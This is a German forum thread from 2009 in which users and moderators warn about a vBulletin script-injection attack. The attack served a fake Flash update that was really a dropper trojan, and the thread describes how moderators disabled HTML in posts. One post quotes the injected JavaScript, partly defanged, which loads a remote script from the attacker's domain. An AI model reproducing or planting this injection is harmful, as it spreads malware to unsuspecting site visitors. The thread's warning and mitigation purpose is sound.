Hallo,

seit kurzem erhalte ich - nur bei FMS.de - die Nachricht, dass mein Flash alt ist und ich doch bitte ein "dringendes Sicherheitsupdate" installieren soll. Die Binary, die er mir dann vorsetzt, kommt von www.windows-updateserver.com

Diese Datei auf keinen Fall installieren!!!

Konkret hats mich im Thread http://www.funkmeldesystem.de/foren/showthread.php?t=44125
erwischt. Ganz ists das Posting von AnaJu.

Soll ein Userscript sein, welches durchrutscht:
http://www.emuenzen.de/forum/funktionalitaet-des-forums/54785-trojaner-im-forum.html

EDIT: Dieser Herr AnaJu hat schon einige Foren mit seinem Trojaner gespickt :-(

ist bei mir auch aufgetaucht. Was soll dieser S***** ?

Auf keinen Fall installieren. Wer weiß, was die mit euren Daten anstellen.

Admin und zuständige Mods wurden bereits verständigt.
Danke für die Info!

Fabsi, wir danken Dir:
Situation entspannt, Gefahr gebannt, User gebannt, Beitrag verbrannt.

Besser hätte es keiner sagen können ;)

Jetzt lassen wir diesen Thread auch in den weiten des Forums verschwinden.

Besser hätte es keiner sagen können ;)

Jetzt lassen wir diesen Thread auch in den weiten des Forums verschwinden.

Fabsi hat am Telefon gesagt: "Mach doch was draus, was sich reimt, das hat schon Pumuckl gesagt: Was sich reimt ist gut!"

Hat einen zufällig nen Namen, wie der heißt, den man sich da einfangen kann????

Ich habs wohl auch gesehen - hab die Seite dann aber zugeklickt, weil mich dieser penetrante Downloadkram genervt hat.... Dank Firefox ist der Link gleich in der Ignorierliste gelandet.

Leider nein, ich hab gar nicht auf "Download" geklickt...
Sonst hätte ich dir den Kaspersky-Log geschickt.

Ungewollt gereimt... :)

Hier mal das Antivir Log....war da mal wieder etwas fix mit dem "Update-laden" :)



"In der Datei 'C:\Programme\Messenger Plus! Live\Scripts\SendTo\_sendfile.exe'
wurde ein Virus oder unerwünschtes Programm 'TR/Dropper.Gen' [trojan] gefunden.
Ausgeführte Aktion: Datei löschen"

'TR/Dropper.Gen' [trojan]
Also kurzum: Nix brauchbares. Dass es sich hierbei um nen Dropper handelt, der Daten ausm Netz nachlädt, war eigentlich schon klar ^^

Achtung! Bitte auf keinen Fall den Beitrag über den "BMD im 2m Band" von Hardstyleboy anklicken.

Das grenzdebile Scriptkiddie "AnaJu2" alias "AnaJu" hat mal wieder seinen Trojaner eingeschleust.
Nicht den Beitrag öffnen und keinesfalls die Datei downloaden, die erscheint! Es ist kein Update!

Und vielleicht kann ja AnaJu endlich mal diesen Sch*** hier lassen. Wird Zeit, dass die Schule wieder losgeht - die sommerliche Wärme scheint ihm nicht zu bekommen....

http://www.smilevalley.de/smileys/Boese/64.gif (http://www.smilevalley.de)

SCHIEB !!!



is ja schon WICHTIG !!!!!!!!!!!!!!

So... scheint ja so, als hätte ihm jemand Einhalt geboten - oder aht er selbser den beitrag wieder entfernt?

Müssen wir jetzt öfters mit sowas rechnen?
Vielleicht sollten wir uns für den nächsten Fall schonmal was überlegen....

Dann kann mein Beitrag hier jetzt ja verschoben werden....

Ich hab von sowas keine Ahnung, aber ist es nicht möglich einen Vierenscanner so zu Installiren, dass wenn jemand was im Forum Hochladen will, es erst durch den Scanner muss???

da ist noch nicht mal ein link drin in dem beitrag, was macht ihr hier für einen alarm? :o

da ist noch nicht mal ein link drin in dem beitrag, was macht ihr hier für einen alarm? :o

Beitrag wurde gelöscht und User gesperrt...

Allerdings hatte als es ausfiel der einzige Mod der gerade aktiv war, keine Rechte im BOS-Forum um auch den Beitrag zu löschen ;)

MfG Fabsi

da ist noch nicht mal ein link drin in dem beitrag, was macht ihr hier für einen alarm? :o

Man braucht kein Link, der Browser versucht in vestimmten Fällen automatisch was nachzuladen.

joa und alles durch den scanner beim hochladen ?? glaube das würde viel speicher und zeit dauern .....

Sagt mal, kann mir jemand eine "von Hand" Anleitung zur Installation dieses Trojaners
geben ? Mein Linux will und will den einfach nicht automatisch starten ^^

Ich glaube, all die Apfel-User da draussen können von dem Problem auch dasselbe Lied
singen ..

All die nette Software, die sich automatisch aufdrängen will, und ich kann sie einfach
nicht nutzen :-(

Bei Äpfeln und Pinguinen kommt halt nicht alles durchs "Fenster" geflogen ;)

kann mir jmd als zufriedener windows nutzer erklären wie diese art angriff überhaupt funktioniert und keine sicherheitsmaßnahmen greifen?

Schwachstelle in der Forensoftware suchen, finden &nutzen-->javascript code einfüge-->Voila der Browser meldet Update

ah und wie wird der eingefügt?


was in den beitrag geschrieben oder während der beitrag an den server gesendet wird?

ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.

ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.

Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein


{script}
Hier Schadcode nach wahl
{/script}
benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hier (http://www.emuenzen.de/forum/funktionalitaet-des-forums/54785-trojaner-im-forum.html)

EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht

achso...

ich dachte auch das die software sowas filtert....


naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?

Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:


XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
</div>
<div align="center">
</XXXXX> (die XXX sind nur Platzhalter - damit das Ding etwas entschärft ist)

Würde mich interessieren, was er damit bezwecken will.... Vielleicht kommt er ja noch wieder und klärt uns auf.

Würde mich interessieren, was er damit bezwecken will....

Ein BOT-Netz aufbauen :)

hier wird der gute Glaube und der Up-to-date Sinn der Internetnutzer ausgenutzt.



"Von Adobe, das kann ja nicht falsch sein."

achso...

ich dachte auch das die software sowas filtert....


naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?

Sie filterts nicht, weil sie's nicht erkennt, ob es was Schadhaftes ist oder solche netten Hinweis-Boxen wie wir Mods sie gerne verwenden.

Ist aber nun alles deaktiviert.

achso:)

kann man das nicht filtern? also das nur moderatoren scripte nutzen dürfen?

Daran wird derzeit gerade gearbeitet :)
Backdraft ist schon dran!

achso:)


gut dann hör ich auf mit nerven:D

21. Juli 2009

Wir erhalten in letzter Zeit vermehrt Hinweise, dass sich Benutzer in Foren registrieren und Javaskript-Code in ihre Beiträge schreiben. Ziel dabei ist, dass Leser dieser Beiträge aufgefordert werden, angebliche Browser-Plug-in-Updates (z.B. von Flash) zu installieren und dazu auf täuschend echt aussehende Herstellerseiten weitergeleitet werden. Dabei wird dann kein Update, sondern ein Trojaner installiert.
Ein auffälliger Benutzername, der solche Beiträge in letzter Zeit schreibt, ist AnaJu.

Erfolgreich ist dieser Angriff nur, wenn Benutzern erlaubt ist, HTML-Code im Forum zu speichern.
vBulletin ist standardmäßig so konfiguriert, dass von Benutzern eingegebener HTML-Code nicht ausgeführt wird und diese Art von Angriff auf Ihre Benutzer somit wirkungslos ist.

Wenn Sie nicht sicher sind, ob HTML-Code erlaubt ist oder nicht, sollten Sie die folgenden Einstellungen überprüfen:

vBulletin-Einstellungen -> Benutzer: Notizen

vBulletin-Einstellungen -> Texte: BB-Code

vBulletin-Einstellungen -> Benutzer: Private Nachrichten

vBulletin-Einstellungen -> Projektverwaltung (falls vorhanden)

Foren & Moderatoren -> Foren verwalten -> Alle Foren überprüfen

Kalender -> Kalender verwalten -> Alle Kalender überprüfen

Benutzergruppen -> Benutzergruppen verwalten -> Signaturen und Blog (falls vorhanden)



Ihr vBulletin-Germany Team

Also wie gesagt, HTML ist komplett deaktiviert. Ob es für einzelne Gruppen schaltbar wird, weiß ich noch nicht.

Hats doch was gebracht, dass ich Herrn AnaJu mal bei VBulettin angesch**** hab http://www.smilevalley.de/smileys/Sauer/158.gif (http://www.smilevalley.de)
Ich konts mir nicht verkneifen zumal er mir noch in anderen Foren vor die Flinte gekommen ist.... Aber scheint ja gut aufgefallen zu sein, der Vogel. Hoffentlich ist nun Ruhe!
(Solange trotz der geänderten Einstellungen meine Smilies noch gehen, iss alles in Ordnung...) http://www.smilevalley.de/smileys/Gluecklich/29.gif (http://www.smilevalley.de)

Ein Hoch auf Pipsi http://www.smilevalley.de/smileys/Party/106.gif (http://www.smilevalley.de)

P.S.: Die Smileys werden auch über BB-Code eingefügt ;) versuchst du die per HTML einzubinden gehts nicht .

Hats doch was gebracht, dass ich Herrn AnaJu mal bei VBulettin angesch**** hab http://www.smilevalley.de/smileys/Sauer/158.gif (http://www.smilevalley.de)
Ich konts mir nicht verkneifen zumal er mir noch in anderen Foren vor die Flinte gekommen ist.... Aber scheint ja gut aufgefallen zu sein, der Vogel. Hoffentlich ist nun Ruhe!
(Solange trotz der geänderten Einstellungen meine Smilies noch gehen, iss alles in Ordnung...) http://www.smilevalley.de/smileys/Gluecklich/29.gif (http://www.smilevalley.de)

Ohne Dich enttäuschen zu wollen: AnaJu ist ein Bot und keine reale Person. Der Bot ist auch nicht wegen Deines Hinweises aufgeflogen sondern kursiert schon seit längerem in sämtlichen vBulletin-Foren.

Hats doch was gebracht, dass ich Herrn AnaJu mal bei VBulettin angesch**** hab http://www.smilevalley.de/smileys/Sauer/158.gif (http://www.smilevalley.de)
Ich konts mir nicht verkneifen zumal er mir noch in anderen Foren vor die Flinte gekommen ist.... Aber scheint ja gut aufgefallen zu sein, der Vogel. Hoffentlich ist nun Ruhe!
(Solange trotz der geänderten Einstellungen meine Smilies noch gehen, iss alles in Ordnung...) http://www.smilevalley.de/smileys/Gluecklich/29.gif (http://www.smilevalley.de)



und der blink smilly ist ja mal voll augenkrebs beschleunigend ^^

das musste jetzt sien :-)

Ohne Dich enttäuschen zu wollen: AnaJu ist ein Bot und keine reale Person. Der Bot ist auch nicht wegen Deines Hinweises aufgeflogen sondern kursiert schon seit längerem in sämtlichen vBulletin-Foren.
Falsch, AnaJu macht sein Zeug manuell. Seine Beiträge hatten immer einen Bezug zum Thread, auch wenn der Inhalt gegen Null geht.

Im Münzforum sagte er "tolle münzen" - bei uns gings um nen Lehrgang oder Training, hier sagte, dass er das auch gemacht hat. Von daher geht der manuell die Foren durch... :D

Dachte ich mir auch, da die Inhalte immer threadbezogen waren, egal in welchem Forum!

Hat irgendeiner eine Ahnung, welcher Virus/Trojaner/sonstwas hinter der Datei gesteckt hat? Der Herr Kaspersky hat sich nämlich nicht gerührt.

Hat irgendeiner eine Ahnung, welcher Virus/Trojaner/sonstwas hinter der Datei gesteckt hat? Der Herr Kaspersky hat sich nämlich nicht gerührt.
Das war ein ordinärer, sog. Dropper. Dieser ist relativ klein, kann mit weiterer Software gekoppelt werden und lädt dann - vom Ersteller spezifizierte - Daten nach, die die eigentliche Schadroutine beinhalten.

Mit dem Ding an sich hab ich mich nicht weiter befasst, ich wette aber, es wird ein Botnetz dahinter stehen. Da der Autor auch andere Foren, in denen prinzipbedingt weniger geballt "Geheimnisträger" auftauchen kompromittiert hat, gehe ich nicht von einer echten Trojaner-Schnüffelattacke zum Erhalt von BOS-Informationen aus.

Also irgendwas ist da definitiv im Busch. Ich kann nur von meinem Forum sagen, dass in den letzten Wochen mehrmals die .htaccess von aussen ausgetauscht wurden, die dann jeden Zugriff von meiner Seite auf einen Server mit Schadsoftware weiterleitete. Dort wurde versucht ein Exploit auszuführen. Ich kann mir bis heute nicht erklären wie das Passwort von meinem FTP-Zugang geknackt werden konnte.

Interessanter weise waren nur alle Verzeichnisse betroffen, die nicht zum Forum gehörten. Das Forum bliebt also verschont. Welche Taktik dahinter steckt ist mir schleierhaft.

Seit ich das FTP-Passwort nun auf ein 20stelliges mit Buchstaben/Zahlen/Zeichen geändert habe ist nun erstmal wieder ruhe.

und der blink smilly ist ja mal voll augenkrebs beschleunigend ^^

das musste jetzt sien :-)

Ich find den gut.... http://www.smilevalley.de/smileys/Gluecklich/29.gif (http://www.smilevalley.de) http://www.smilevalley.de/smileys/Gluecklich/29.gif (http://www.smilevalley.de) http://www.smilevalley.de/smileys/Gluecklich/29.gif (http://www.smilevalley.de) http://www.smilevalley.de/smileys/Gluecklich/29.gif (http://www.smilevalley.de) http://www.smilevalley.de/smileys/Gluecklich/29.gif (http://www.smilevalley.de) http://www.smilevalley.de/smileys/Gluecklich/29.gif (http://www.smilevalley.de)

Ohne Dich enttäuschen zu wollen: AnaJu ist ein Bot und keine reale Person. Der Bot ist auch nicht wegen Deines Hinweises aufgeflogen sondern kursiert schon seit längerem in sämtlichen vBulletin-Foren.

http://www.smilevalley.de/smileys/Schilder/59.gif (http://www.smilevalley.de) - Aber wenn wir alle so einem Treiben nur zusehen würden, was wäre dann???? Daher kann bei einem soooo massiven Auftreten eine kurze Nachricht an den "Hersteller" ja nicht schaden um ein eventuelles "Sicherheitsleck" zu flicken. DU kannst ja weiter gerne zusehen...

Naja, und das AnaJu kein Bot ist - darüber brauchen wir nicht zu streiten. Ansonsten wäre es ein recht kreativer Bot....